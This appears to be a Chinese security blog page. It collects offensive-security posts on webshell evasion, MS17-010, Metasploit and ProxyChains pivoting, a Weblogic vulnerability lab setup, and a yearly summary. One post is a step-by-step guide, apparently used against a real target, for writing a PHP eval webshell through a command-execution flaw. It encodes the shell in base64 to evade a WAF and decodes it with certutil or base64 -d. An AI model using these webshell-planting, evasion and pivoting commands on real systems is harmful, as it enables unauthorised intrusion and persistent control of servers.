PHP从零学习到Webshell免杀手册 手册概述临渊羡鱼，不如退而结网；扬汤止沸，不如去火抽薪。手册版本号：V1.4.1-2023/10/04 这是一本能让你从零开始学习PHP的WebShell免杀的手册，同时我会在内部群迭代更新开源地址： https://github.com/AabyssZG/WebShell-Bypass-Guide SeeBug Paper地址：https://paper.seebug.org/3044/如果师傅们觉得不错，可以给我点个Star哈哈~有什么新的WebShell免杀姿势、手法，欢迎与我交流

避坑：Win10环境MS17-010漏洞复现过程 0# 概述MS17-010这个漏洞想必大家都已经很熟悉了吧，这里就不过多赘述（如果不了解的自行百度）最近，乌鸦安全公众号的 crow 师傅想要在Win10上复现MS17-010（永恒之蓝）的漏洞，为此也在群里面引发了群友的讨论，但是群友们多次尝试都是失败的，于是便找到我我发现目前互联网上，都没有记录Win10如何完美复现MS17-010的相关文章（有些文章也只是粗略的一笔带过，没有相关错误的解决方法），于是这里就记录一下Win10环境的MS17-010复现过程中碰到的坑点和利用方式吧

苛刻条件下:C2上传执行骚姿势 0# 概述在前期Web打点成功获得对应权限后，就进入了后渗透（提权、内网渗透、域渗透）的阶段，但是在有些时候，总会出现各种各样奇怪的情况，在此也分享一些经验出来。最近团队师傅找到我，想要让我帮忙提权一个站点，正好用上了这个骚操作，看网上好像都没有人记录这个手法，这边就浅浅记录一下，希望能帮助到屏幕前面的你。

对于某些畸形PHP的加密和解密方法 0# 概述在Web渗透攻防的情况下，很多时候在前期打点，需要对Webshell进行各种免杀操作来过Waf或者防止防守方的觉察。这时候，各种PHP的加密算法层出不穷，都是将PHP的执行语句，通过加密的方式内嵌在文件当中，来做到“瞒天过海”。刚好最近碰到了一个PHP文件，用了两种畸形的加密方式，看了一眼网上好像也没好的文章讲讲怎么分析的，这里就带大家重温一下这两种加密的解密方式。

对于Spring Boot的渗透姿势 0# Spring Boot概述Spring Boot 是由Pivotal团队提供的全新框架，其设计目的是用来简化 Spring 应用的创建、运行、调试、部署等。使用 Spring Boot 可以做到专注于 Spring 应用的开发，而无需过多关注 XML 的配置。Spring Boot 使用“习惯优于配置”的理念，简单来说，它提供了一堆依赖打包，并已经按照使用习惯解决了依赖问题。使用 Spring Boot 可以不用或者只需要很少的 Spring 配置就可以让企业项目快速运行起来。

内网渗透中使用ProxyChains进行代理 概述在内网渗透当中，往往需要将内网的流量代理出来很多时候，我们常常用Frp等内网穿透工具将内网的相关流量穿透出来，但在有多个网段的情况下很容易就会搞混于是在Linux当中，有款命令行代理工具——ProxyChains非常好用，我个人比较喜欢将它用作内网跨网段渗透。有些师傅不知道，这里就记录一下工具介绍ProxyChains是Linux和其他Unix下的代理工具。它可以使任何程序通过代理上网，允许TCP和DNS通过代理隧道，支持HTTP/SOCKS4/SOCKS5类型的代理服务器，并且可配置多个代理。ProxyChains通过一个用户定义的代理列表强制连接指定的应用程序，直接断开接收方和发送方的连接。ProxyChains 是一个强制应用的 TCP 连接通过代理的工具，支持 Tor/HTTP/Socks 代理。需要注意的是，ProxyChains 只会将当前应用的 TCP 连接转发至代理，而非全局代理。工具的安装在新版本KaliLinux下（懒得测试老版本了）自带该工具，不需要进行安装操作如果没有的话，也可以像这样快捷安装：Ubuntu可以直接使用apt安装，如下：sudo apt-get install proxychains其他系统，可以选择编译安装，如下：git clone https://github.com/rofl0r/proxychains-ng cd proxychains-ng ./configure sudo make && make install工具的使用我们首先来看下，简单的模拟情景思维导图如下：攻击者已经通过MSF控制了外部Web服务器，目的是想要对内网OA服务器进行内网渗透第一步、使用MSF生成socks代理攻击者使用的MSF开启代理：msfconsole use auxiliary/server/socks4a exploit默认就会在1080端口开放socks4代理第二步、更改ProxyChains配置文件vi /etc/proxychains.conf socks4 192.168.0.66 1080 //新增一行第三步、利用外层Web服务器的meterpreter，添加静态路由sessions 1 //根据自己的实际情况进入session run autoroute -s 10.10.1.0/24 //绑定内网网段 run autoroute -p //查看是否绑定成功第四步、使用代理进行攻击这里以Nmap举例：proxychains3 nmap -sT -Pn 10.10.1.12 -p 80 //扫描10.10.1.12的80端口使用火狐打开内网OA页面：proxychains3 firefox http://10.10.1.12使用Python脚本对内网OA进行攻击：proxychains3 python Exp.py -u http://10.10.1.12 proxychains3 python3 Exp.py -u http://10.10.1.12举个例子，这里要看具体Python脚本的参数总结这就是一个小小的工具使用技巧分享文章希望对各位师傅的内网渗透有所帮助

避坑小记：Weblogic漏洞复现环境搭建 0# 什么是Weblogic？WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。根据我的个人经验，国内金融产业（银行）、政府等单位都比较喜欢Weblogic，应用还是相对比较广泛的1# 关于Weblogic搭建在平常的信息安全相关工作、学习过程中，Weblogic的相关漏洞经常会碰到。而Weblogic环境搭建过程很繁琐，并且平常想要进行代码调试、漏洞复现的时候，经常会有搭建各种Weblogic版本和各种JDK版本的排列组合的需求，导致安全研究人员苦不堪言。我早些年也被这个问题搞得焦头烂额，当时我一气之下封装了好几个docker才解决问题，但花了不少精力和世界，有没有一个更优雅的方法解决这个问题呢？最近刚好有两个Weblogic漏洞比较感兴趣，想上手分析一下。正好又看到了奇安信A-Team的Weblogic快速构建项目，这里就上手来试一下，并随手记录一下整个搭建过程。2# 准备工作2.1# 准备工具VMware虚拟机（其他虚拟机也行）CentOS 7镜像（这个快速构建项目只能用CentOS，刚开始我用Ubuntu跑不起来，算是踩坑了）WeblogicEnvironment（奇安信A-Team的Weblogic快速构建项目）对应版本的JDK安装包（看你需求）对应版本的Weblogic安装包（看你需求）2.2# 资源下载方式CentOS镜像下载地址： http://mirrors.aliyun.com/centos/7.9.2009/isos/x86_64/ 下载 CentOS-7-x86_64-DVD-2009.iso 即可，也可以用 CentOS-7-x86_64-DVD-2009.torrent 种子进行下载WeblogicEnvironment： https://github.com/QAX-A-Team/WeblogicEnvironment 直接下载代码即可JDK安装包下载地址： https://www.oracle.com/java/technologies/downloads/archive/ 选择要安装的版本，比如我想要安装JDK7，直接点击对应链接：选择 Linux x64 并下载即可Weblogic安装包下载地址： https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html 选择要安装的版本，比如我想要安装 Oracle WebLogic Server 10.3.6，选择 Generic Installer 并下载即可3# 开始搭建Weblogic漏洞复现环境准备工作都完成了，那就开始搭建吧~3.1# 安装CentOS到虚拟机这一步不需要我教你了吧，有问题百度如果需要把CentOS系统语言改为中文，可以参考这篇文章： https://www.cnblogs.com/-zzf/p/16137234.html 换源的话，如果觉得原始源太慢可以选择换源安装VM-Tools，在命令行输入以下命令：sudo yum install -y open-vm-tools sudo yum install -y open-vm-tools-desktop3.2# CentOS安装Docker最好是切换到 root 账户（我怕权限问题）su root在终端执行以下命令：yum install -y docker显示Docker安装完毕，验证一下是否安装正常即可：docker --version或者是这样：yum list installed | grep docker如果想每次在服务器启动后都自动启动 Docker 的话，可以使用以下命令开启：systemctl enable docker3.2# 配置WeblogicEnvironment将刚才准备的WeblogicEnvironment压缩包复制到CentOS并解压：根据项目描述，打开解压后的文件夹，创建两个新文件夹，名字分别是 jdks 和 weblogics然后将准备好的JDK安装包和Weblogic安装包分别放到 jdks 和 weblogics 这两个文件夹里面3.3# 运行WeblogicEnvironment这个项目提供了一键构建Docker镜像的sh脚本，但我们需要修改一下项目文档中也给出了示例：{card-describe title="项目示例代码"}以Weblogic12.1.3配JDK 7u21为例，构建镜像命令如下：docker build --build-arg JDK_PKG=jdk-7u21-linux-x64.tar.gz --build-arg WEBLOGIC_JAR=fmw_12.1.3.0.0_wls.jar -t weblogic12013jdk7u21 .镜像构建完成后，执行以下命令运行：docker run -d -p 7001:7001 -p 8453:8453 -p 5556:5556 --name weblogic12013jdk7u21 weblogic12013jdk7u21{/card-describe}同样这两行代码也包含在项目的sh脚本中了，我们修改一下sh脚本文件保存即可：接下来给文件夹赋予执行权限：cd /home/demo/WeblogicEnvironment-master //根据项目的位置自行切换 chmod -R 777 ../WeblogicEnvironment-master然后看一下执行权限给了没：cd /home/demo/WeblogicEnvironment-master //根据项目的位置自行切换 ls -l接下来执行脚本即可：./run_weblogic1036jdk7u21.sh //刚才修改的sh脚本名字3.4# 解决报错问题这个时候会报错：Error: Failed to download metadata for repo 'appstream': Cannot prepare internal mirrorlist: No URLs in mirrorlist{card-describe title="报错解决过程"}首先，进入到 yum 的 repos 目录cd /etc/yum.repos.d/其次，修改相关文件内容：sed -i 's/mirrorlist/#mirrorlist/g' /etc/yum.repos.d/CentOS-* sed -i 's|#baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-*然后，安装 wget：yum install wget –y //如果已经安装了wget就不需要这一步接着，更新 yum 源为阿里源：wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo最后，生成缓存更新（第一次更新，速度稍微有点慢，耐心等待两分钟左右）：yum clean all yum makecache验证安装 vim 看有无报错：yum install -y vim最重要的一步，修改项目的 Dockerfile 文件！修改开头内容为：FROM centos FROM centos:centos7注释掉以下内容为：# 解决libnsl包丢失的问题 #RUN yum -y install libnsl{/card-describe}3.5# 成功搭建Weblogic漏洞复现环境再次运行sh脚本即可成功将Docker环境跑起来：访问 虚拟机IP:7001/console/login/LoginForm.jsp 能登录到 Weblogic Server 管理控制台，用户名密码如下：默认用户名：weblogic 默认密码：qaxateam014# 总结搭建一路上还是遇到了不少坑，也卡了挺久的，有时候确实让人很烦躁但技术的学习就是这样，很多时候都是在发现问题、解决问题，只有认真、耐心的去面对并解决问题，才能有相应的成长和收获！同时也希望这篇文章能给各位师傅带来帮助~

Web系统的RCE漏洞的Getshell姿势 情景描述今天早上在研究一个Web系统的0Day，虽然是个任意命令执行漏洞，但是这个RCE有些局限，就想通过RCE写个WebShell提提权再看看目标系统：Microsoft Windows Server 2019 Standard动态脚本：PHP 5.6GetShell姿势通常我们写入文件，通常都会使用CMD的echo命令echo 文件内容 > "文件名"假如我们要写php一句话的时候，比如：<?php eval($_POST["aabyss"]); ?>这时候有同学就想到这样不就好了：echo <?php eval($_POST["aabyss"]);?> > "webshell.php"但实际上这样是不行的，因为以下特殊符号是无法直接放入echo语句（执行会提示语法错误或者无法写入这些符号）：& | > < +所以通常我们会把特殊符号通过^来进行转义，比如这样：echo ^<?php eval($_POST["aabyss"]);?^> > "webshell.php"通常就能写入了难点来了但是我早上尝试的那个0day，语句没办法通过^进行转义，或者写入的流量被WAF拦截，怎么办呢？首先，我想到了通过""双引号进行包含进行写入，比如：echo echo "<?php eval($_POST["aabyss"]);?>" > "webshell.php"文件内容如下："<?php eval($_POST["aabyss"]);?>"这样虽然能写入& | > < +这些特殊符号，但是代码最外层带了""，实测php代码是无法执行的于是我又想到了Base64编码进行写入，首先对一句话内容进行base编码：于是得到编码后的Base64字符串，如下：PD9waHAgZXZhbCgkX1BPU1RbImFhYnlzcyJdKTsgID8+但是通过上文，我们发现+也是不能写入的，怎么办呢？这时候插入在外部插入一些数字就能简单解决啦：这时候就得到一份做好的Base64字符串：MTw/cGhwIGV2YWwoJF9QT1NUWyJhYWJ5c3MiXSk7ICA/PjEy接下来通过echo将Base64字符串写入TXT文件即可：echo MTw/cGhwIGV2YWwoJF9QT1NUWyJhYWJ5c3MiXSk7ICA/PjEy > "base64.txt"接下来通过命令进行解密：certutil -f -decode "base64.txt" "webshell.txt"然后将webshell.txt复制为php文件即可大功告成：copy webshell.txt webshell.php其他一些tips对于Linux系统，可以采用系统命令直接解密Base64来写入：echo 'MTw/cGhwIGV2YWwoJF9QT1NUWyJhYWJ5c3MiXSk7ICA/PjEy' | base64 -d > webshell.php查看当前目录：cd解密Base64文件到上层目录：certutil -f -decode "base64.txt" "../webshell.txt"将命令输入内容写入文件查看：命令 >> out.txt

2022，我的年终总结 2022年终总结时间总是过得飞快，转眼间，就来到2022最后一天了要不是阳了快好了，我还就真的错过了这一天在2022年这一年当中，发生了许多事，也经历了许多，有些唏嘘：参加了浙江省HW行动（红队）和国家HW行动（蓝队），获第一名得到奖金参加5场大大小小的网络安全赛事，总体一般，还待努力2022年中开始运营自己的推特（@AabyssZG），发表自己对技术的一些看法，目前粉丝大约千余人维护好团队的相关网站，建立了团队内部漏洞库（wiki.aabyss.cn），更新了团队的渗透导航（dh.aabyss.cn）比赛中对于CTF相关知识的运用更加得心应手（诸如反序列化）建立并维护好团队的公众号，目前粉丝已达5000余人在内网渗透和免杀这块的知识得到了很大的深入应用和锻炼在多个漏洞平台提交了中高危漏洞年末建立了自己的个人博客（blog.zgsec.cn），准备开始沉淀自己对于2023年的期望{x} 能拥有自己的一个原创高危漏洞证书{x} 在学习过程中，编写相关的开源工具方便自己未来的工作和生活{ } 在Java安全领域有所建树，继续深入学习Java代码审计{x} 在CTF比赛方面继续投入精力来取得成绩{x} 寒假期间，挖一挖Edu教育行业的漏洞（目前我们团队排在第5名）{x} 能参加几场国内线下的安全论坛/会议（之前一直因为疫情无法到场）{x} 交接好工作室，培养好新一届的学弟学妹{x} 广开视野，广交朋友